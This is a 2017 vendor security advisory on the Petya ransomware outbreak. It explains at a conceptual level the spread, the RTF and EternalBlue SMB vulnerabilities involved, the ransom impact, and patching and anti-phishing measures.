Petya Ransomware Attack

  • Source:SANGFOR Security Center
  • Date Published:2017-06-30
#

Summary

DESCRIPTION

In the evening of June, 27th, 2017, a malicious ransomware known as Petya spread across the world. According to foreign news media HackerNews, in Ukraine, many banks including the national bank Oschadbank and many other private banks, electric power company KyivEnergo, and national post system UkrPoshta were all attacked by Petya.

At present, Petya has spread across Ukraine, Russia, India, Spain, France, UK and many European countries.

VULNERABILITY ANALYSIS

According to the researches conducted by SANGFOR FurtherEye security team, Petya is a type of malware which is mainly distributed via emails or worms. Two main vulnerabilities involved are Windows RTF vulnerability and MS17-010SMB vulnerability.

1.(CVE-2017-0199) RTF Vulnerability

Attackers take advantage of CVE-2017-0199 RTF vulnerability to take over a computer once users are lured to open specially constructed Microsoft Office documents in the computer.

To put it simply, malicious codes are embedded in Microsoft Office documents and can be executed and exploited by attackers once users try to open the documents.

In most cases, when users try to open Microsoft Office documents(RTF documents, or other types of Microsoft Office documents such as PPT, etc) which are embedded with malicious codes, HTA program will be automatically downloaded from malicious websites and be executed, then attackers can take over the computer.

In this case, attackers take advantage of CVE-2017-0199 RTF vulnerability to distribute Perya ransomware through phishing emails. 

2.MS17-010 SMB EternalBlue Vulnerability

MS17-010 SMB EternalBlue Vulnerability is one of the most important vulnerabilities released by Equation Group in April this year.

EternalBlue employs Windows SMB privilege escalation vulnerability to attack Windows system whose 445 port has been enabled and escalate to system privilege.

In Windows server systems, TCP 445 is used for sharing files or printers in the local area network. Attackers can obtain all sorts of shared information in specific local area network by establishing connections with TCP 445.

After exploiting CVE-2017-0199 RTF vulnerability to select nodes, MS17-010 SMB EternalBlue vulnerability is exploited to infect servers, among which shared service has been established through TCP 445. 

IMPACTS

Petya ransomware is a new type of malware that blocks access to a computer or server. When a computer is infected, the ransomware encrypts important documents and files and then demands a ransom.

Petya encrypts files through encrypting disks, which is different from traditional ransomware. According to the researches, at present only 65 types of files can be encrypted, including common types of files. Once a computer is infected, users have to pay 300 dollars in Bitcoin to get files decrypted.

SOLUTION

1.In order to protect computers from being infected, download: PetyaTool.

2.This ransomware has not been widely spread in China since many computers or servers had been installed patch due to the spread of WannaCry last month. Patches are also available for those who are infected: 

Patch for (CVE-2017-0199) RTF vulnerability: 

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

Patch for S17-010 SMB EternalBlue vulnerability: 

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

3. Be cautious of phishing emails. Do not open emails with unknown attachments or links.

4.  Sangfor has released security protection rules to defend against the two vulnerabilities mentioned above. Upgrade is not required.